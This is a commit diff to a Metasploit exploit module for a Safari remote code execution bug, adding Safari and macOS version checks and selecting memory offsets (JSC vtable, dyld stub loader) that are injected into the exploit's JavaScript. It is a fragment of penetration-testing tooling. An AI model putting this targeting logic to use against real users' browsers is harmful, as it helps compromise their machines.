Land #11347, add version check to Safari RCE exploit
parent
b016447ea6
commit
99cc417a5c
|
@ -98,14 +98,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def get_offsets(user_agent)
|
||||
if user_agent =~ /Intel Mac OS X (.*?)\)/
|
||||
version = $1.gsub("_", ".")
|
||||
mac_osx_version = Gem::Version.new(version)
|
||||
osx_version = $1.gsub("_", ".")
|
||||
if user_agent =~ /Version\/(.*?) /
|
||||
if Gem::Version.new($1) >= Gem::Version.new('11.1.1')
|
||||
print_warning "Safari version #{$1} is not vulnerable"
|
||||
return false
|
||||
else
|
||||
print_good "Safari version #{$1} appears to be vulnerable"
|
||||
end
|
||||
end
|
||||
mac_osx_version = Gem::Version.new(osx_version)
|
||||
if mac_osx_version >= Gem::Version.new('10.13.4')
|
||||
print_warning "macOS version #{mac_osx_version} is not vulnerable"
|
||||
elsif mac_osx_version < Gem::Version.new('10.12')
|
||||
print_warning "macOS version #{mac_osx_version} is not vulnerable"
|
||||
elsif offset_table.key?(version)
|
||||
offset = offset_table[version]
|
||||
elsif offset_table.key?(osx_version)
|
||||
offset = offset_table[osx_version]
|
||||
return <<-EOF
|
||||
const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
|
||||
const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
|
||||
|
|
Loading…
Reference in New Issue